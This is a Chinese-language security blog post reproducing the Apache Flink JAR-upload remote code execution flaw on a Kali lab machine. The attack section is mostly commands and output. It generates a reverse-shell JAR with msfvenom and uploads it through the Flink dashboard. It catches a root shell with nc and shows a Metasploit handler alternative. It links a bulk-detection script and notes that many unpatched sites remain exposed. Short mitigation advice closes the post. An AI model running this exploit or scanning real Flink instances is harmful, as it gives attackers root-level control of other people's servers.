Apache Flink任意Jar包上傳漏洞復現

2019-11-21 136376人圍觀 ,發現 17 個不明物體 漏洞

0×01前言

周三的時候,安全網站上看到有一個新爆出的關于Aapche Flink的JAR包上傳導致任意代碼執行的漏洞。周四在看的時候已經出了一部分POC和抓取相關漏洞機器的代碼,放在編譯器里跑了一下好像不行。最后在周五的時候找了相關Apache環境復現一下這個漏洞。其實到現在漏洞出現才第二天,很多機器仍存在這個問題,謹慎使用,最后附上Github上批量檢測腳本。

如有錯誤的地方,請大佬們指出,我將馬上更改,同時感謝各個平臺大佬們發布的資料及文件。

0×02漏洞危險等級

惡意JAR包上傳,導致任意命令執行,反彈shell為root權限。

屬于高危漏洞

0×03漏洞概述

Apache Flink的任意Jar包上傳導致遠程代碼執行的漏洞。攻擊者只需要自己定制一個惡意jar上傳,即可達到攻擊目的。

影響版本:

<= 1.9.1(最新版本)

鏡像下載地址

https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

Apache Flink相關描述:

https://www.jianshu.com/p/a4d0e00e313b

0×04漏洞復現

在網站上下載相關的版本的tgz包,解壓到Kali上

Cd 到解壓文件的bin目錄下

[email protected]:~/Desktop/flink-1.9.1/bin# ./start-cluster.sh

Starting cluster.

Starting standalonesession daemon on host kali.

Starting taskexecutor daemon on host kali.

[email protected]:~/Desktop/flink-1.9.1/bin# service apache2 start【開啟Apache服務】

打開http://ip地址:8081進入apache flink的默認管理目錄

Kali生成惡意jar包,并且輸出到桌面:

[email protected]:~/Desktop/flink-1.9.1/bin# msfvenom -p java/shell_reverse_tcp lhost=192.168.28.139 lport=5555 -f jar >/root/Desktop/shell.jar

Cat shell.jsp也可以查看源碼

剩下要做的就是在默認的flink管理目錄下點擊submit new job上傳惡意jar包

同時nc -nlvp 5555 ,監聽5555端口

[email protected]:~/Desktop/flink-1.9.1/bin# nc -nlvp 5555

listening on [any] 5555 …

connect to [192.168.28.139] from (UNKNOWN) [192.168.28.139] 36302

id

uid=0(root) gid=0(root) 組=0(root)

whoami

root

pwd

/root/Desktop/flink-1.9.1/bin

成功反彈shell,同時是root權限

第二種反彈shell的方式

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload java/shell_reverse_tcp

payload => java/shell_reverse_tcp

msf5 exploit(multi/handler) > set lhost 192.168.28.139

lhost => 192.168.28.139

msf5 exploit(multi/handler) > set lport 5555

lport => 5555

msf5 exploit(multi/handler) > run

反彈shell

導入python模塊顯示用戶

0×05批量檢測腳本

Github源碼網站:

https://github.com/AleWong/Apache-Flink-Web-Dashboard-RCE

參考文獻/資料來源:

https://blog.csdn.net/sun1318578251/article/details/103056168

https://www.cnblogs.com/Cl0wn/p/11855160.html

Tips:漏洞前天才出來,現在仍有大量網站存在這樣的漏洞,大佬們小心的玩。

0×06漏洞修補

對上傳的jar包內容進行前端和后端校驗

或者開設登錄8081時界面的身份驗證

更多專業的等方法,等補丁的發布。

小白第一次記錄學習筆記,希望大佬們給予更多的建議和技術上的幫助。謝謝~

*本文作者:ShShroudroud,轉載請注明來自FreeBuf.COM

相關推薦

這些評論亮了

  • 網絡安全威脅信息管理 回復
    警告:完整復現過程
    )6( 亮了
發表評論

已有 17 條評論

取消
Loading...

特別推薦

活動預告

填寫個人信息

姓名
電話
郵箱
公司
行業
職位
css.php 什么app能玩二人麻将